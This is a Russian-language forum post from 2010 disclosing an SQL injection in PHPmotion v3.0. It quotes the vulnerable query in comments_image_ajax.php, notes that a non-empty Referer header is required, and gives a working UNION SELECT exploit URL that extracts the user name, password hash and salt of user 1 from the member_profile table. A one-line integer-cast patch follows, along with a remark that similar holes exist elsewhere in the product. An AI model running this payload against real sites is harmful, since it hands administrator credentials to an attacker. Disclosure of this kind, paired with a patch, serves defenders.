Старый 07.07.2010, 10:27   #1
oRb
 
Аватар для oRb
 
Регистрация: 01.07.2010
Сообщений: 319
Репутация: 138
По умолчанию PHPmotion

Сайт: http://phpmotion.com

Уязвимость: SQL-injection
Версия: v3.0
Зависимости: Необходимо удовлетворить следующий код:
PHP код:
$referer    mysql_real_escape_string($_SERVER['HTTP_REFERER']); 
if ( 
$referer == "" header("Location: " "index.php"); 
Описание: файл comments_image_ajax.php
PHP код:
... 
$image_id             mysql_real_escape_string$_GET['image'] ); 
... 
$sql         "SELECT * FROM imagecomments WHERE image_id = $image_id ORDER BY indexer DESC LIMIT $limit_value$limit"
$query     = @mysql_query($sql); 
... 
Эксплоит: /comments_image_ajax.php?image=0+and+0+union+select +1,concat_ws(0x3a,user_name,password,passwordSalt) ,3,4,5,6,7,8,9,10,11+from+member_profile+where+use r_id=1--+
Патч:
PHP код:
$image_id = (int)$_GET['image']; 

ps: подобные уязвимости там еще встречаются. Попадалось несколько скриптов, где должен быть уязвим параметр uid, но если он не число, то вылетает
Цитата:
Error - Invalid Input Detected
Где и как идет фильтрация - хз, так как часть сорцов под phpSHIELD.
__________________
Не оказываю никаких услуг.
I don't provide any services.
oRb вне форума   Ответить с цитированием
Ответ

Метки
phpmotion, sql-inj

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot